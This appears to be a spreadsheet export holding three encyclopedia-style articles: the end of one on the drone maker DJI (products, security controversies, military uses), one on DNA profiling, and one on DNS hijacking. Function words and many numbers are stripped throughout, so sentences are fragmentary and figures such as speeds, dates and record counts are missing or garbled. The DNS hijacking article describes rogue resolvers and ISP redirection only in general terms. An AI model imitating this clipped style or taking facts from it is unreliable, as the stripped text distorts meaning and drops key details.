sophisticated automated assembly lines. many components assembly lines built in-house. products flight systems controllers develops flight controllers intended multi-rotor stabilization control various platforms heavy payloads aerial photography. controller includes orientation, landing, home return features. products include gps-compass receivers, indicators bluetooth connectivity. camera stabilization, platforms ronin ronin (如影) standalone ground-based camera platform developed cinematography aerial filmmaking professional environments. built professional videography photography targets film industry. using three individual motors, ronin stabilizes moving vigorously. later models ronin include ronin-m, ronin ronin-s, ronin-sc, ronin modules uavs flame wheel flame wheel (风火轮) series multirotor platforms aerial photography. 2016, hexacopter f550, quadcopters f330 f450. recent kit. phantom phantom (精灵) series evolved integrated flight programming camera, wi-fi lightbridge connectivity, pilot's mobile device. phantoms made aerial cinematography photography applications, also used recreational use.there four generations product line, recent phantom rtk, announced october 2018. mavic mini mavic series currently includes mavic pro, mavic platinum, mavic air, mavic mavic pro, mavic zoom, mavic enterprise, mavic enterprise advanced, mavic mavic cine, mavic mini, mini mini mini pro. release mavic without controversy, however, announced safety feature, airsense (ads-b), would available models outside usa. shortages components complexities production owing ongoing covid-19 crisis time blamed. starting mini mavic name dropped models mini released april 2021. mavic mavic cine released november 2021, 10pm edt. mavic superseded mavic mavic zoom priced prosumers professionals hobbyists. spreading wings spreading wings (筋斗云) series mainly industrial uavs professional aerial photography, high definition mapping, ultra-light search rescue, surveillance etc. based camera gear board. 2013, models released: s800 regular evo. inspire inspire series professional series camera quadcopters similar phantom line, aluminum-magnesium body carbon fibre arms, well detachable props inspire presented 2017.inspire specifications: matrice matrice (经纬) series designed industrial applications, including surveying, inspection, search rescue firefighting.the matrice fully programmable customizable drone, launched july 2015. expansion communication ports, allows developers additional components different purposes. matrice 600pro released november 2016, followed matrice announced february 2017. spark released 2017, spark features 12-megapixel camera stabilized mechanically 2-axis gimbal. spark also carries advanced infrared camera helps drone detect obstacles front well facilitating hand-gesture control. addition smartphone virtual controller, physical controller also bought.there multiple complaints drone switches fall flying. responded releasing mandatory battery firmware update august 2017. november 2019 mavic mini released, replacing spark dji's consumer line-up. march 2021, announced launch fpv, entirely type hybrid drone combining first-person view (fpv) high-speed performance racing drones, cinematic camera reliability traditional consumer drones, optional innovative motion controller allows pilots control drone single-handed movements. based dji's earlier digital system, drone features high-performance motors maximum speed km/h mph) 0-100 acceleration seconds manual mode, intuitive user interface latest safety features greater flight control. system lets pilots drone's perspective low-latency high-definition video thanks "o3", third iteration dji's proprietary ocusync technology. allows pilots capture ultra-smooth stable video stabilization rocksteady electronic image stabilization. camcorders osmo osmo (灵眸) camcorder developed dji. camera uses smartphone view camera footage record take either 12–16 stills. later models include osmo pocket osmo action.the osmo mobile relies user's smartphone camera. most smartphones accepted gimbal width range 2.31–3.34 inch (58.6-84.8 mm). original osmo mobile reached end-of-life replaced second generation, called mobile osmo osmo mobile announced august 2019, designed social media crowd. zenmuse gimbal-cameras zenmuse (禅思) series gimbal cameras mixed system made compact camera 3-axis gimbal, designed part modular system, example attached uavs. 2019 zenmuse gimbal camera features camera interchangeable prime dl-mount lenses. goggles series head-mounted displays designed drone flying. there different product lines series, goggles (dji飞行眼镜) digital system (fpv数字图传系统). goggles designed interface dji-branded drones, using dual display screens, wireless connectivity direct photo video capture control. november 2017, also released goggles ("racing edition"), featured compatibility racing quadcopters. digital system standalone system designed non-dji brand custom-built drones. educational robots robomaster june 2019, unveiled robomaster (机甲大师 s1), first consumer ground drone, named dji's annual robomaster robot combat competition, unofficial mascot. tank-like rover remotely controlled first-person view wi-fi microsoft windows, apple google android mobile devices. designed "advanced educational robot", user assemble loose parts learn program functionality. both scratch python programming languages employed along learning modules teach user code. robomaster robomaster (机甲大师 officially released march 2020, although first teased youtube robomaster commercial november 2019. august 2020, formally launched upgraded version named robomaster core. intended counterpart engineer robot competition, core features gripper numerous infrared distance sensors detect 0.1–10 (3.9 in). supports third-party sensors open-source hardware micro bit, arduino raspberry controversies privacy security concerns u.s. united states department interior office aviation services said analysis july 2017 dji's software meet requirement decline lock device information sharing including telemetry aircraft, software applications preventing automated uploads downloads." response published offline mode allows drones without transferring data internet.the register reported august 2017 dji's contained jspatch framework allowed hot-patch without triggering review apple, without first seeking user consent. this apple's rules 45,000 apps blocked appstore "hot patching concerns". august united states army also changed internal guidance disallowing products, especially battlefield scenarios. guidance based army research laboratory report 2017 found cyber-vulnerabilities. army's decision launched public research speculated decision data link controller drone vulnerable.as result, released bounty program finding flaws. security researcher kevin finisterre reported security breach private customer data bounty program. breach, developers pushed private keys ssl, cloud storage firmware keys github repository. finisterre's description technica, able access flight data images uploaded customers, including photos government ids, drivers licenses, passports. some data included flight logs accounts associated government military domains. however, long discussion dji's legal team, decided turn $30,000 bounty publish information.in 2018, response allegations mishandling user data, commissioned kivu consulting make larger analysis. kivu found connected internet, worked without internet connection uploaded data user confirmation. also used servers located except crash reporting called bugly uploaded crash reports server located china.in january 2020, united states department interior announced would grounding around drones security concerns, using wildlife conservation infrastructure monitoring purposes.in 2020 report analyzing data dji's mimo app, used control osmo gimbles smartphone, security research company river loop security made several discoveries concern" users policy-makers. according researchers, social media sends variety data, including sensitive personal information, insecure means servers located china without user consent, raising suspicions personal user data could freely accessible chinese authorities. user information also sent third-party servers, "where terms agreement supports cooperation chinese government."in july 2020, reports synacktiv grimm security mobile found collected user information (imsi, imei, serial number card) phones able force installation updates. also prompted user grant permission "install unknown apps" installing update site. also integrated social media site weibo's similar allowed install weibo related third-party apps also. synacktiv wrote "given wide permissions required contacts, microphone, camera, location, storage, change network connectivity weibo chinese servers almost full control user's phone."dji responded "system detects official version example, modified remove critical flight safety features like geofencing altitude restrictions notify user require download recent official version website. future versions, users also able download official version google play available country" statement release said weibo user's need proactively turn also responded “dji able restart without input user, investigating researchers claim (that stay running closed) august 2020, synacktiv alleged dji's pilot shares many issues present denied. analysis booz allen hamilton reported find evidence unauthorized data transfers china. apps used backend servers located only exception crash analytics contacted chinese servers.in november 2020, senators chris coons, rick scott, others criticized decision united states force purchase drones security grounds. u.s. sanctions december 2020, united states department commerce added bureau industry security's entity list. january 2021, trump signed executive order mandating removal chinese-made drones u.s. government fleets. december 2021, united states department treasury prohibited investment u.s. individuals entities, accusing company assisting people's liberation army complicity aiding uyghur genocide. pentagon analysis 2021, united states department defense issued analysis products. unclassified portion report concluded types drone "government edition" line-up shows malicious code intent recommended government entities forces working services." this according summary obtained hill though defense department respond inquiry asking elaboration. incidents involving products january 2015, phantom drone crashed white house's south lawn, washington, d.c., later no-fly geo-system according prohibited airspace, forced drones update firmware. system introduced prevent flights getting closer take restricted zones, based location.a phantom drone carrying radioactive material landed prime minister's official residence tokyo, japan—the 2015 tokyo drone incident. subsequently, national diet passed restricting drone flights near government buildings nuclear sites.in 2016, isis used drones exploding devices iraq. later created broad no-fly zone nearly iraq syria. that year, drone nearly involved midair collision chinese fighter jet. chinese government subsequently insisted develop traffic registry track drones within china.on march 2018, israel defense forces used dji's matrice drone drop tear above.on august 2018, matrice drones detonated explosives near avenida bolívar, caracas apparent attempt assassinate venezuelan president nicolás maduro. 2022 russian invasion ukraine ukraine used drones extensively invaded russia, battlefield footage suggests usage russia well. after german retailer media markt stopped selling drones, said products civilian inappropriate military. following criticism company's operation russia, suspended business prevent products used combat.a ukrainian soldier told russian forces able drones' aeroscope function track ukrainian operators. ukrainian vice prime minister mykhailo fedorov said without no-fly zones imposed dji, drones used russia ukrainian forces russian forces able track ukrainian drones using aeroscope detection platform. replied twitter saying drones designed civilians requirements aeroscope remote make inappropriate military use. geofencing ukraine government make formal request, could affect parties' drones unless individual units prevented downloading geofencing update. verge find confirmed reports interviewed spokesperson clarify issue. also list unmanned aerial vehicles china list chinese companies references external links media related (company) wikimedia commons official website</t>
  </si>
  <si>
    <t>DNA profiling</t>
  </si>
  <si>
    <t>profiling (also called fingerprinting) process determining individual's characteristics. analysis intended identify species, rather individual, called barcoding. discovered alec jeffreys 1984, profiling forensic technique criminal investigations, comparing criminal suspects' profiles evidence assess likelihood involvement crime. also used paternity testing, establish immigration eligibility, genealogical medical research. profiling also used study animal plant populations fields zoology, botany, agriculture. background process profiling developed 1984 british geneticist alec jeffreys working department genetics university leicester.the process, developed jeffreys conjunction peter gill dave werrett forensic science service (fss), first used forensically solving murder teenagers raped murdered narborough, leicestershire 1983 1986. murder inquiry, detective david baker, contained within blood samples obtained voluntarily around 5,000 local willingly assisted leicestershire constabulary investigation, resulted exoneration richard buckland, initial suspect confessed crimes, subsequent conviction colin pitchfork january 1988. pitchfork, local bakery employee, coerced coworker kelly stand providing blood sample—kelly used forged passport impersonate pitchfork. another coworker reported deception police. pitchfork arrested, blood sent jeffrey's processing profile development. pitchfork's profile matched left murderer confirmed pitchfork's presence crime scenes; pleaded guilty murders. although 99.9% human sequences every person, enough different possible distinguish individual another, unless monozygotic (identical) twins. profiling uses repetitive sequences highly variable, called variable number tandem repeats (vntrs), particular short tandem repeats (strs), also known microsatellites, minisatellites. vntr loci similar closely related individuals, variable unrelated individuals unlikely vntrs. profiling processes extraction when sample blood saliva obtained, small part present sample. before analyzed, must extracted cells purified. there many ways accomplished, methods follow basic procedure. cell nuclear membranes need broken allow free solution. once free, separated cellular components. after separated solution, remaining cellular debris removed solution discarded, leaving dna. common methods extraction include organic extraction (also called phenol chloroform extraction), chelex extraction, solid phase extraction. differential extraction modified version extraction different types cells separated purified solution. each method extraction works well laboratory, analysts typically selects preferred method based factors cost, time involved, quantity yielded, quality yielded. rflp analysis rflp stands restriction fragment length polymorphism and, terms analysis, describes testing method utilizes restriction enzymes "cut" short specific sequences throughout sample. start processing laboratory, sample first extraction protocol, vary depending sample type and/or laboratory sops (standard operating procedures). once "extracted" cells within sample separated away extraneous cellular materials nucleases would degrade dna, sample introduced desired restriction enzymes discernable fragments. following enzyme digestion, southern blot performed. southern blots size-based separation method performed either radioactive chemiluminescent probes. rflp could conducted single-locus multi-locus probes (probes target either location multiple locations dna). incorporating multi-locus probes allowed higher discrimination power analysis, however completion process could take several days week sample extreme amount time required step required visualization probes. polymerase chain reaction (pcr) analysis analysis system profiling used today based polymerase chain reaction (pcr) uses simple sequences.from country country, different str-based dna-profiling systems use. north america, systems amplify codis core loci almost universal, whereas united kingdom dna-17 loci system use, australia uses core markers.the true power analysis statistical power discrimination. because loci currently used discrimination codis independently assorted (having certain number repeats locus change likelihood number repeats locus), product rule probabilities applied. this means that, someone type abc, three loci independent, probability individual type probability type times probability type times probability type this resulted ability generate match probabilities quintillion (1x1018) more. however, database searches showed much frequent expected false profile matches. y-chromosome analysis paternal inheritance, y-haplotypes provide information genetic ancestry male population. investigate population history, provide estimates haplotype frequencies criminal casework, haplotype reference database (yhrd)" created 2000 online resource. currently comprises 300,000 minimal locus) haplotypes world-wide populations. mitochondrial analysis mtdna obtained material hair shafts bones/teeth. control mechanism based interaction point data. this determined tooled placement sample. issues forensic samples when people think analysis often think shows like ncis csi, portray samples coming instantly analyzed, followed pulling picture suspect within minutes⁠. true reality, however, quite different perfect samples often collected scene crime. homicide victims frequently left exposed harsh conditions found objects used commit crimes often handled person. prevalent issues forensic scientists encounter analyzing samples degraded samples mixtures. degraded before modern methods existed almost impossible analyze degraded samples. methods like restriction fragment length polymorphism rflp restriction fragment length polymorphism, first technique used analysis forensic science, required high molecular weight sample order reliable data. high molecular weight however something lacking degraded samples, fragmented accurately carry rflp. modern techniques invented analysis degraded samples able carried polymerase chain reaction. multiplex particular made possible isolate amplify small fragments still left degraded samples. when multiplex methods compared older methods like rflp vast difference seen. multiplex theoretically amplify less dna, rflp least order carry analysis. ministr analysis instances samples degraded, like case intense fires remains bone fragments, standard testing samples inadequate. when standard testing done highly degraded samples larger loci often drop out, partial profiles obtained. while partial profiles powerful tool, random match probabilities larger full profile obtained. method developed order analyse degraded samples ministr technology. approach, primers specially designed bind closer region.in normal testing primers bind longer sequences contain region within segment. ministr analysis however target location, results product much smaller.by placing primers closer actual regions, higher chance successful amplification region occur. successful amplification regions occur complete profiles obtained. success smaller products produce higher success rate highly degraded samples first reported 1995, ministr technology used identify victims waco fire. mixtures mixtures another common issue forensic scientists face analyzing unknown questionable samples. mixture defined sample contains individual contributors. this often occur sample swabbed item handled person sample contains victim assailants' dna. presence individual sample make challenging detect individual profiles, interpretation mixtures done highly trained individuals. mixtures contain three individuals interpreted, though difficult. mixtures contain four individuals much convoluted individual profiles. common scenario mixture often obtained case sexual assault. sample collected contains material victim, victim's consensual sexual partners, perpetrator(s).as detection methods profiling advance, forensic scientists seeing samples contain mixtures, even smallest contributor able detected modern tests. ease forensic scientists interpenetrating mixtures largely depends ratio present individual, genotype combinations, total amount amplified. ratio often important aspect look determining whether mixture interpreted. example, case sample contributors, would easy interpret individual profiles ratio contributed person much higher second person. when sample three contributors, becomes extremely difficult determine individual profiles. fortunately, advancements probabilistic genotyping could make sort determination possible future. probabilistic genotyping uses complex computer software thousands mathematical computations order produce statistical likelihoods individual genotypes found mixture. databases early application database compilation mitochondrial concordance, prepared kevin miller john dawson university cambridge 1996 1999 data collected part miller's thesis. there several databases existence around world. some private, largest databases government-controlled. united states maintains largest database, combined index system (codis) holding million records 2018. united kingdom maintains national database (ndnad), similar size, despite uk's smaller population. size database, rate growth, giving concern civil liberties groups police wide-ranging powers take samples retain even event acquittal. conservative–liberal democrat coalition partially addressed concerns part protection freedoms 2012, samples must deleted suspects acquitted charged, except relation certain (mostly serious and/or sexual) offenses. public discourse around introduction advanced forensic techniques (such genetic genealogy using public genealogy databases phenotyping approaches) limited, disjointed, unfocused, raises issues privacy consent warrant establishment additional legal protections.the u.s. patriot united states provides means u.s. government samples suspected terrorists. information crimes collected deposited codis database, maintained fbi. codis enables enforcement officials test samples crimes matches within database, providing means finding specific biological profiles associated collected evidence.when match made national databank link crime scene offender provided sample database, link often referred cold hit. cold value referring police agency specific suspect less evidential value match made outside databank.fbi agents cannot legally store person convicted crime. collected suspect later convicted must disposed entered database. 1998, residing arrested accusation burglary. taken tested, later released. nine months later, man's accidentally illegally entered database. automatically compared found cold cases and, case, found match found rape assault case year earlier. government prosecuted crimes. during trial match requested removed evidence illegally entered database. request carried out. perpetrator, collected victims rape, stored years match found. 2014, address problem, congress extended bill helps states deal backlog" evidence. considerations evaluating evidence when using rflp, theoretical risk coincidental match billion (100,000,000,000), although practical risk actually 1,000 monozygotic twins 0.2% human population. moreover, rate laboratory error almost certainly higher this, often actual laboratory procedures reflect theory coincidence probabilities computed. example, coincidence probabilities calculated based probabilities markers samples bands precisely location, laboratory worker conclude similar—but precisely identical—band patterns result identical genetic samples imperfection agarose gel. however, case, laboratory worker increases coincidence risk expanding criteria declaring match. studies conducted 2000s quoted relatively high error rates, cause concern. early days genetic fingerprinting, necessary population data accurately compute match probability sometimes unavailable. between 1992 1996, arbitrary ceilings controversially match probabilities used rflp analysis rather higher theoretically computed ones. evidence genetic relationship possible profiling evidence genetic relationship, although evidence varies strength weak positive. testing shows relationship absolutely certain. further, almost individuals single distinct genes, ultra-rare individuals, known "chimeras", least different sets genes. there cases profiling falsely suggested mother unrelated children. fake evidence functional analysis genes coding sequences (open reading frames [orfs]) typically requires expressed, encoded protein purified, antibodies produced, phenotypes examined, intracellular localization determined, interactions proteins sought. study conducted life science company nucleix published journal forensic science international, scientists found vitro synthesized sample matching desired genetic profile constructed using standard molecular biology techniques without obtaining actual tissue person. nucleix claims also prove difference non-altered synthesized. evidence criminal trials familial searching familial searching (sometimes referred "familial dna" "familial database searching") practice creating investigative leads cases evidence found scene crime (forensic profile) strongly resembles existing profile (offender profile) state database exact match. after leads exhausted, investigators specially developed software compare forensic profile profiles taken state's database generate list offenders already database likely close relative individual whose forensic profile.familial database searching first used investigation leading conviction jeffrey gafoor murder lynette white united kingdom july 2003. evidence matched gafoor's nephew, years born time murder 1988. used 2004 find threw brick motorway bridge lorry driver, killing him. found brick matched found scene theft earlier day, good matches national database. wider search found partial match individual; questioned, revealed brother, craig harman, lived close original crime scene. harman voluntarily submitted sample, confessed matched sample brick. 2011, familial database searching conducted national level united states, states determine conduct familial searches. first familial search subsequent conviction united states conducted denver, colorado, 2008, using software developed leadership denver district attorney mitch morrissey denver police department crime director gregg laberge. california first state implement policy familial searching then-attorney general jerry brown, later became governor. role consultant familial search working group california department justice, former alameda county prosecutor rock harmon widely considered catalyst adoption familial search technology california. technique used catch angeles serial killer known "grim sleeper" 2010. witness informant tipped enforcement identity "grim sleeper" serial killer, eluded police decades, suspect's son. suspect's arrested convicted felony weapons charge swabbed year before. when entered database convicted felons, detectives alerted partial match evidence found "grim sleeper" crime scenes. david franklin jr., also known grim sleeper, charged counts murder count attempted murder. more recently, familial arrest 21-year-old elvis garcia charges sexual assault false imprisonment woman santa cruz 2008. march 2011 virginia governor mcdonnell announced virginia would begin using familial searches.at press conference virginia march 2011, regarding east coast rapist, prince william county prosecutor paul ebert fairfax county police detective john kelly said case would solved years virginia used familial searching. aaron thomas, suspected east coast rapist, arrested connection rape women virginia rhode island, familial used case.critics familial database searches argue technique invasion individual's amendment rights. privacy advocates petitioning database restrictions, arguing fair search possible matches relatives offenders arrestees would population-wide database. some scholars pointed privacy concerns surrounding familial searching similar respects police search techniques, concluded practice constitutional. ninth circuit court appeals united states pool (vacated moot) suggested practice somewhat analogous witness looking photograph person stating looked like perpetrator, leads enforcement show witness photos similar looking individuals, identified perpetrator.critics also state racial profiling could occur account familial testing. united states, conviction rates racial minorities much higher overall population. unclear whether discrimination police officers courts, opposed simple higher rate offence among minorities. arrest-based databases, found majority united states, lead even greater level racial discrimination. arrest, opposed conviction, relies much heavily police discretion.for instance, investigators denver district attorney's office successfully identified suspect property theft case using familial search. example, suspect's blood left scene crime strongly resembled current colorado department corrections prisoner. partial matches partial matches result moderate stringency codis searches produce potential match shares least allele every locus. partial matching involve familial search software, used united states, additional y-str analysis, therefore often misses sibling relationships. partial matching used identify suspects several cases united states, also used tool exonerate falsely accused. darryl hunt wrongly convicted connection rape murder young woman 1984 north carolina. surreptitious collecting police forces collect samples without suspect's knowledge, evidence. legality practice questioned australia.in united states, accepted, courts often ruling expectation privacy, citing california greenwood (1988), supreme court held fourth amendment prohibit warrantless search seizure garbage left collection outside curtilage home. critics practice underline analogy ignores "most people idea risk surrendering genetic identity police instance, failing destroy used coffee cup. moreover, even realize avoid abandoning one's public."the united states supreme court ruled maryland king (2013) sampling prisoners arrested serious crimes constitutional.in human tissue 2004 prohibits private individuals covertly collecting biological samples (hair, fingernails, etc.) analysis, exempts medical criminal investigations prohibition. england wales evidence expert compared samples must accompanied evidence sources samples procedures obtaining profiles. judge must ensure jury must understand significance matches mismatches profiles. judge must also ensure jury confuse match probability (the probability person chosen random matching profile sample scene) probability person matching committed crime. 1996 dohenyjuries weigh conflicting corroborative evidence, using common sense using mathematical formulae, bayes' theorem, avoid "confusion, misunderstanding misjudgment". presentation evaluation evidence partial incomplete profiles bates, moore-bick said: reason partial profile evidence admissible provided jury made aware inherent limitations given sufficient explanation enable evaluate there cases match probability relation samples tested great judge would consider probative value minimal decide exclude evidence exercise discretion, gives rise question principle left decision case case basis. however, fact exists case partial profile evidence possibility "missing" allele might exculpate accused altogether provide sufficient grounds rejecting evidence. many possibility least theory) evidence would assist accused perhaps even exculpate altogether exists, provide grounds excluding relevant evidence available otherwise admissible, though make important ensure jury given sufficient information enable evaluate evidence properly. testing united states there state laws profiling states united states. detailed information database laws state found national conference state legislatures website. development artificial august 2009, scientists israel raised serious doubts concerning enforcement ultimate method identification. paper published journal forensic science international: genetics, israeli researchers demonstrated possible manufacture laboratory, thus falsifying evidence. scientists fabricated saliva blood samples, originally contained person supposed donor blood saliva.the researchers also showed that, using database, possible take information profile manufacture match done without access actual person whose duplicating. synthetic oligos required procedure common molecular laboratories.the york times quoted lead author, daniel frumkin, saying, "you engineer crime scene biology undergraduate could perform this". frumkin perfected test differentiate real samples fake ones. test detects epigenetic modifications, particular, methylation. seventy percent human genome methylated, meaning contains methyl group modifications within dinucleotide context. methylation promoter region associated gene silencing. synthetic lacks epigenetic modification, allows test distinguish manufactured genuine dna.it unknown many police departments, any, currently test. police publicly announced using test verify results. cases 1986, richard buckland exonerated, despite admitted rape murder teenager near leicester, city profiling first developed. this first fingerprinting criminal investigation, first prove suspect's innocence. following year colin pitchfork identified perpetrator murder, addition another, using techniques cleared buckland. 1987, genetic fingerprinting used criminal court first time trial accused unlawful intercourse mentally disabled 14-year-old female gave birth baby. 1987, florida rapist tommie andrews first person united states convicted result evidence, raping woman burglary; convicted november 1987, sentenced years prison. 1990, violent murder young student brno first criminal case czechoslovakia solved evidence, murderer sentenced years prison. 1992, palo verde tree used convict mark alan bogan murder. seed pods tree crime scene found match seed pods found bogan's truck. this first instance plant admitted criminal case. 1994, claim anna anderson grand duchess anastasia nikolaevna russia tested death using samples tissue stored charlottesville, virginia hospital following medical procedure. tissue tested using fingerprinting, showed bore relation romanovs. 1994, earl washington, jr., virginia death sentence commuted life imprisonment week scheduled execution date based evidence. received full pardon 2000 based advanced testing. 1999, raymond easton, disabled swindon, england, arrested detained seven hours connection burglary. released inaccurate match. retained file unrelated domestic incident time previously. 2000 frank smith proved innocent profiling murder eight-year-old girl spending years death florida, usa. however died cancer innocence proven. view florida state governor ordered future death inmate claiming innocence testing. 2000 gordon graham murdered paul gault home lisburn, northern ireland. graham convicted murder found sports left house part elaborate ploy suggest murder occurred burglary gone wrong. graham affair victim's wife time murder. first time copy number used northern ireland. 2001, wayne butler convicted murder celia douty. first murder australia solved using profiling. 2002, body james hanratty, hanged 1962 murder", exhumed samples body members family analysed. results convinced court appeal judges hanratty's guilt, strenuously disputed campaigners, proved "beyond doubt". paul foot campaigners continued believe hanratty's innocence argued evidence could contaminated, noting small samples items clothing, kept police laboratory years conditions satisfy modern evidential standards", subjected amplification techniques order yield genetic profile. however, hanratty's found evidence tested, contrary would expected evidence indeed contaminated. august 2002, annalisa vincenzi shot dead tuscany. bartender peter hamkin, arrested, merseyside march 2003 extradition warrant heard street magistrates' court london establish whether taken italy face murder charge. "proved" shot her, cleared evidence. 2003, welshman jeffrey gafoor convicted 1988 murder lynette white, crime scene evidence collected years earlier re-examined using techniques, resulting match nephew. june 2003, evidence, dennis halstead, john kogut john restivo re-trial murder conviction, convictions struck released. 2004, testing shed light mysterious 1912 disappearance bobby dunbar, four-year-old vanished fishing trip. allegedly found alive eight months later custody william cantwell walters, another woman claimed son, bruce anderson, entrusted walters' custody. courts disbelieved claim convicted walters kidnapping. raised known bobby dunbar throughout rest life. however, tests dunbar's nephew revealed related, thus establishing found 1912 bobby dunbar, whose real fate remains unknown. 2005, gary leiterman convicted 1969 murder jane mixer, student university michigan, found mixer's pantyhose matched leiterman. drop blood mixer's hand matched john ruelas, four years 1969 never successfully connected case way. leiterman's defense unsuccessfully argued unexplained match blood spot ruelas pointed cross-contamination raised doubts reliability lab's identification leiterman. november 2008, anthony curcio arrested masterminding elaborately planned armored heists history. evidence linked curcio crime. march 2009, sean hodgson—convicted 1979 killing teresa simone, southampton—was released tests proved scene his. later matched retrieved exhumed body david lace. lace previously confessed crime believed detectives. served time prison crimes committed time murder committed suicide 1988. 2012, case babies switched, many decades earlier, discovered accident. after undertaking testing purposes, alice collins plebuch advised ancestry appeared include significant ashkenazi jewish component, despite belief family predominantly irish descent. profiling plebuch's genome suggested included distinct unexpected components associated ashkenazi, middle eastern, eastern european populations. this plebuch conduct extensive investigation, concluded father switched (possibly accidentally) another baby soon birth. plebuch also able identify biological ancestors father. 2016 anthea ring, abandoned baby, able sample matching database discover deceased mother's identity roots county mayo, ireland. recently developed forensic test subsequently used capture saliva left stamps envelopes suspected father, uncovered painstaking genealogy research. first three samples degraded use. however, fourth, enough found. test, degree accuracy acceptable courts, proved named patrick coyne biological father. 2018 buckskin girl body found 1981 ohio) identified marcia king arkansas using genealogical techniques 2018 joseph james deangelo arrested main suspect golden state killer using genealogy techniques. 2018, william earl talbott arrested suspect 1987 murders cook tanya cuylenborg assistance genealogical testing. genetic genealogist helped case also helped police arrests 2018. evidence evidence prove rights succession british titles testing used establish right succession british titles.cases: baron moynihan pringle baronets also references further reading external links mckie 2009). "eureka moment discovery fingerprinting". observer. london. forensic science, statistics, blog tracks scientific legal developments pertinent forensic profiling create fingerprint pbs.org silico simulation molecular biology techniques place learn typing techniques simulating national databases innocence record, winston strawn llp/the innocence project making sense backlogs, 2012: myths reality united states department justice "making sense forensic genetics". january 2017. retrieved april 2020. sense science</t>
  </si>
  <si>
    <t>DNS hijacking</t>
  </si>
  <si>
    <t>hijacking, poisoning, redirection practice subverting resolution domain name system (dns) queries. this achieved malware overrides computer's tcp/ip configuration point rogue server control attacker, modifying behaviour trusted server comply internet standards. these modifications made malicious purposes phishing, self-serving purposes internet service providers (isps), great firewall china public/router-based online server providers direct users' traffic isp's servers advertisements served, statistics collected, purposes isp; service providers block access selected domains form censorship. technical background functions server translate domain name address applications need connect internet resource website. this functionality defined various formal internet standards define protocol considerable detail. servers implicitly trusted internet-facing computers users correctly resolve names actual addresses registered owners internet domain. rogue server rogue server translates domain names desirable websites (search engines, banks, brokers, etc.) addresses sites unintended content, even malicious websites. most users depend servers automatically assigned isps. router's assigned servers also altered remote exploitation vulnerability within router's firmware. when users visit websites, instead sent bogus website. this attack termed pharming. site redirected malicious website, masquerading legitimate website, order fraudulently obtain sensitive information, called phishing. manipulation isps number consumer isps at&amp;t, cablevision's optimum online, centurylink, communications, rcn, rogers, charter communications (spectrum), plusnet, verizon, sprint, t-mobile virgin media, frontier communications, bell sympatico, deutsche telekom optus, mediacom, ono, talktalk, bigpond (telstra), ttnet, türksat, indonesian customer isps used hijacking purposes, displaying advertisements collecting statistics. dutch isps xs4all ziggo hijacking court order: ordered block access pirate display warning page customer indonesia hijacking comply national requires every customer indonesian hijack port redirect server block website listed trustpositif kominfo internet sehat campaign. these practices violate standard (nxdomain) responses, potentially open users cross-site scripting attacks.the concern hijacking involves hijacking nxdomain response. internet intranet applications rely nxdomain response describe condition entry specified host. query invalid domain name (for example www.example.invalid), nxdomain response informing application name invalid taking appropriate action (for example, displaying error attempting connect server). however, domain name queried non-compliant isps, would always receive fake address belonging isp. browser, behavior annoying offensive connections address display redirect page provider, sometimes advertising, instead proper error message. however, applications rely nxdomain error instead attempt initiate connections spoofed address, potentially exposing sensitive information. examples functionality breaks hijacks dns: roaming laptops members windows server domain falsely believe back corporate network resources domain controllers, email servers infrastructure appear available. applications therefore attempt initiate connections corporate servers, fail, resulting degraded performance, unnecessary traffic internet connection timeouts. many small office home networks server, relying instead broadcast name resolution. many versions microsoft windows default prioritizing name resolution netbios name resolution broadcasts; therefore, server returns (technically valid) address name desired computer lan, connecting computer uses incorrect address inevitably fails connect desired computer lan. workarounds include using correct address instead computer name, changing dhcpnodetype registry value change name resolution service ordering. browsers firefox longer 'browse name' functionality (where keywords typed address take users closest matching site). local client built modern operating systems cache results searches performance reasons. client switches home network vpn, false entries remain cached, thereby creating service outage connection. dnsbl anti-spam solutions rely dns; false results therefore interfere operation. confidential user data might leaked applications tricked believing servers wish connect available. user choice search engine consult event mistyped browser removed determines search results displayed user. computers configured split tunnel connection stop working intranet names resolved outside tunnel public internet start resolving fictitious addresses, instead resolving correctly tunnel private server nxdomain response received internet. example, mail client attempting resolve record internal mail server receive false response directed paid-results server, messages queued delivery days retransmission attempted vain. breaks proxy autodiscovery protocol (wpad) leading browsers believe incorrectly proxy server configured. breaks monitoring software. example, periodically contacts server determine health, monitor never failure unless monitor tries verify server's cryptographic key.in some, cases, isps provide subscriber-configurable settings disable hijacking nxdomain responses. correctly implemented, setting reverts standard behavior. other isps, however, instead browser cookie store preference. case, underlying behavior resolved: queries continue redirected, redirect page replaced counterfeit error page. applications browsers cannot opted scheme using cookies opt-out targets http protocol, scheme actually implemented protocol-neutral dns. response information commissioner's office acknowledged practice involuntary hijacking contravenes pecr, directive 95/46 data protection require explicit consent processing communication traffic. however, refused intervene, claiming would sensible enforce law, would cause significant indeed any) demonstrable detriment individuals. germany, 2019 revealed deutsche telekom manipulated servers, also transmitted network traffic (such non-secure cookies users https) third party company portal t-online, users redirected manipulation, (any more) owned deutsche telekom. after user filed criminal complaint, deutsche telekom stopped manipulations. icann, international body responsible administering top-level domain names, published memorandum highlighting concerns, affirming: icann strongly discourages redirection, wildcards, synthesized responses form nxdomain substitution existing gtlds, cctlds level tree registry-class domain names. remedy users, dissatisfied poor "opt-out" options like cookies, responded controversy finding ways avoid spoofed nxdomain responses. software bind dnsmasq offer options filter results, gateway router protect entire network. google, among others, open servers currently return spoofed results. user could google public instead isp's servers willing accept service google's privacy policy potentially exposed another method google track user. limitation approach providers block rewrite outside requests. opendns, owned cisco, similar popular service alter nxdomain responses. google april 2016 launched dns-over-https service. this scheme overcome limitations legacy protocol. performs remote dnssec check transfers results secure https tunnel. there also application-level work-arounds, noredirect firefox extension, mitigate behavior. approach like fixes application example, firefox) address issues caused. website owners able fool hijackers using certain settings. example, setting record "unused" wildcard address (e.g. *.example.com). alternatively, setting cname wildcard "example.invalid", making fact '.invalid' guaranteed exist rfc. limitation approach prevents hijacking particular domains, address security issues caused hijacking. also captive portal cache poisoning rebinding spoofing domain hijacking dynamic host configuration protocol pharming point-to-point protocol spoofing attack reset attack trojan.win32.dnschanger references</t>
  </si>
  <si>
    <t>DNS over HTTPS</t>
  </si>
  <si>
